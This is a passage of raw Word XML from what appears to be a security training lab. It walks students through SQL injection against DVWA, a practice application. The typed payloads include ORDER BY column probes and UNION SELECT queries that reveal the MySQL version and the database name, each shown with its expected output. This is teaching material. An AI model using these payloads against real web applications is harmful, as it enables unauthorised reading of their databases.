      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve"> 1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D23C2D" w14:textId="77777777" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve">First name: </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B49ED" w14:textId="77777777" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C8C70" w14:textId="4834710A" w:rsidR="00C81D67" w:rsidRDefault="00C81D67" w:rsidP="00C81D67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fi</w:t>
      </w:r>
      <w:r w:rsidR="00F8304D">
        <w:t>eld</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81D67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C0B4F" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY </w:t>
      </w:r>
      <w:r w:rsidR="003A0067" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>and click</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5394D53B" w14:textId="65F6DFAA" w:rsidR="003A0067" w:rsidRDefault="003A0067" w:rsidP="003A0067">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A0067">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>You should receive the following output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445A7085" w14:textId="39724F52" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t>ID: 1</w:t>
      </w:r>
      <w:r w:rsidR="003C0B4F">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve"> OR</w:t>
      </w:r>
      <w:r>
        <w:t>DER BY</w:t>
      </w:r>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00177321">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B82CB" w14:textId="77777777" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve">First name: </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F595D6" w14:textId="77777777" w:rsidR="00177321" w:rsidRPr="00177321" w:rsidRDefault="00177321" w:rsidP="003F143C">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00177321">
        <w:t xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F864EE4" w14:textId="40CA695C" w:rsidR="00C81D67" w:rsidRDefault="00C81D67" w:rsidP="00C81D67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</w:t>
      </w:r>
      <w:r w:rsidR="00F8304D">
        <w:t>ield</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81D67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C0B4F" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ORDER BY </w:t>
      </w:r>
      <w:r w:rsidR="003A0067" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81D67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>and click</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85C034" w14:textId="51D7276C" w:rsidR="003A0067" w:rsidRDefault="00E23EB5" w:rsidP="003A0067">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha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t xml:space="preserve">This time you should receive </w:t>
      </w:r>
      <w:r w:rsidR="00CF02F5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">error </w:t>
      </w:r>
      <w:r w:rsidR="00237666" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nknow</w:t>
      </w:r>
      <w:r w:rsidR="00237666" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> column </w:t>
      </w:r>
      <w:r w:rsidR="00237666" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00237666" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="006E3B02" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>order clause</w:t>
      </w:r>
      <w:r w:rsidR="006E3B02" w:rsidRPr="003F143C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A2E5E4" w14:textId="047A719E" w:rsidR="00E23EB5" w:rsidRPr="00E0525A" w:rsidRDefault="006E3B02" w:rsidP="003A0067">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha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t>Because</w:t>
      </w:r>
      <w:r w:rsidR="00E23EB5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> the third string returned an error, this </w:t>
      </w:r>
      <w:r w:rsidR="00335DB3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>tells us the query involves two fields</w:t>
      </w:r>
      <w:r w:rsidR="00E23EB5">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>. This is useful information to know as you continue your exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1265CB6A" w14:textId="5CE74A5E" w:rsidR="00F8304D" w:rsidRDefault="00F8304D" w:rsidP="00F8304D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>ersion Database Management System (DBMS)</w:t>
      </w:r>
      <w:r w:rsidR="00E075A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A1A7FB" w14:textId="5039B566" w:rsidR="00F8304D" w:rsidRDefault="00F8304D" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5907">
        <w:t>User ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fi</w:t>
      </w:r>
      <w:r w:rsidR="0041754D">
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81D67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A52D2A" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OR</w:t>
      </w:r>
      <w:r w:rsidR="0048523A" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0048523A" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048523A" w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">and click </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611FE44D" w14:textId="1E41CDBB" w:rsidR="00C81D67" w:rsidRDefault="0048523A" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>At the end of the output</w:t>
      </w:r>
      <w:r w:rsidR="00C40F40">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you should see </w:t>
      </w:r>
      <w:r w:rsidR="004A7704">
        <w:t xml:space="preserve">a result </w:t>
      </w:r>
      <w:r w:rsidR="00DB4978">
        <w:t xml:space="preserve">similar to </w:t>
      </w:r>
      <w:r>
        <w:t>the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCAE46D" w14:textId="4ED01BB1" w:rsidR="00153A84" w:rsidRPr="00153A84" w:rsidRDefault="001E32D4" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00E4090A">
        <w:t>output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6539AC2E" w14:textId="77777777" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t xml:space="preserve">ID: 1' OR 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A0FD5C" w14:textId="598883EB" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t>First name: Pablo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA2E0E" w14:textId="0998DE9E" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t>Surname: Picasso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF69A1" w14:textId="77777777" w:rsidR="00153A84" w:rsidRPr="00153A84" w:rsidRDefault="00153A84" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C60F8A6" w14:textId="77777777" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ID: 1' OR 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C25E9" w14:textId="119997CB" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t>First name: Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C5C938" w14:textId="74B40CCE" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t>Surname: Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A5B44" w14:textId="77777777" w:rsidR="00153A84" w:rsidRPr="00153A84" w:rsidRDefault="00153A84" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BD0C45F" w14:textId="77777777" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t xml:space="preserve">ID: 1' OR 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>VERSION(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00153A84">
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3CDAE" w14:textId="04BC0321" w:rsidR="00153A84" w:rsidRDefault="00153A84" w:rsidP="00153A84">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t>First name: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC5462F" w14:textId="0A961582" w:rsidR="00153A84" w:rsidRPr="00153A84" w:rsidRDefault="00153A84" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="00153A84">
        <w:t xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:r w:rsidRPr="008D680A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5.5.58-0+deb8u1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4198EB9E" w14:textId="4FB4FA77" w:rsidR="0048523A" w:rsidRPr="00DB4978" w:rsidRDefault="00DB4978" w:rsidP="008D680A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB4978">
        <w:t>The output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC211D" w:rsidRPr="004605A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5.58-0+deb8u1</w:t>
      </w:r>
      <w:r w:rsidRPr="004605A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB4978">
        <w:t>indicates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335DB3">
        <w:t>the DBMS is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MySQL version 5.5.58 </w:t>
      </w:r>
      <w:r w:rsidR="00335DB3">
        <w:t>running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on Debian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FECDE55" w14:textId="185CFAB2" w:rsidR="00335DB3" w:rsidRDefault="00335DB3" w:rsidP="00335DB3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Determine the </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">atabase </w:t>
      </w:r>
      <w:r w:rsidR="003A7BF4">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>ame</w:t>
      </w:r>
      <w:r w:rsidR="00A24747">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB524A" w14:textId="471395C6" w:rsidR="00335DB3" w:rsidRDefault="00335DB3" w:rsidP="00335DB3">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>So far you have learned that the database is vulnerable, the query involves two fields, and the DDMS is MySQL 5.5.</w:t>
      </w:r>
      <w:r w:rsidR="000A40A4">
        <w:t>58</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07887595" w14:textId="573C4140" w:rsidR="00335DB3" w:rsidRDefault="00335DB3" w:rsidP="00335DB3">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>Next, you will attempt obtain more schema information about the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA0C8BB" w14:textId="2E881154" w:rsidR="00335DB3" w:rsidRDefault="00335DB3" w:rsidP="004605A3">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5907">
        <w:t>User ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fi</w:t>
      </w:r>
      <w:r w:rsidR="0041754D">
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00C81D67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B95EEB" w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OR 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0041754D" w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DATABASE</w:t>
      </w:r>
      <w:r w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">and click </w:t>
      </w:r>
      <w:r w:rsidRPr="001E2EF7">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E0525A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11241F4C" w14:textId="16E7D433" w:rsidR="0079570D" w:rsidRPr="0079570D" w:rsidRDefault="0079570D" w:rsidP="00260637">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r w:rsidRPr="0079570D">
        <w:t>At the end of the output</w:t>
      </w:r>
      <w:r w:rsidR="00996C9B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0079570D">
        <w:t xml:space="preserve"> you should see </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="0079570D">
        <w:t xml:space="preserve"> following</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A7704">
        <w:t>result</w:t>
      </w:r>
      <w:r w:rsidRPr="0079570D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B6FA7D" w14:textId="21C29185" w:rsidR="0041754D" w:rsidRPr="004605A3" w:rsidRDefault="0041754D" w:rsidP="00463C68">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="004605A3">
        <w:t xml:space="preserve">ID: 1’ OR 1=1 UNION SELECT 1, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0079570D" w:rsidRPr="004605A3">
        <w:t>DATABASE</w:t>
      </w:r>
      <w:r w:rsidRPr="004605A3">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004605A3">
        <w:t>)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B46E5F" w14:textId="77777777" w:rsidR="0041754D" w:rsidRPr="004605A3" w:rsidRDefault="0041754D" w:rsidP="00463C68">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="004605A3">
        <w:t>First name: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FAE7A2" w14:textId="7E4A718F" w:rsidR="0041754D" w:rsidRPr="004605A3" w:rsidRDefault="0041754D" w:rsidP="00463C68">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r w:rsidRPr="004605A3">
        <w:t xml:space="preserve">Surname: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0079570D" w:rsidRPr="004605A3">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11EBFEAA" w14:textId="65FA63E2" w:rsidR="00FB60D3" w:rsidRDefault="0079570D" w:rsidP="00C0522C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This means the name of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0522C">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004605A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
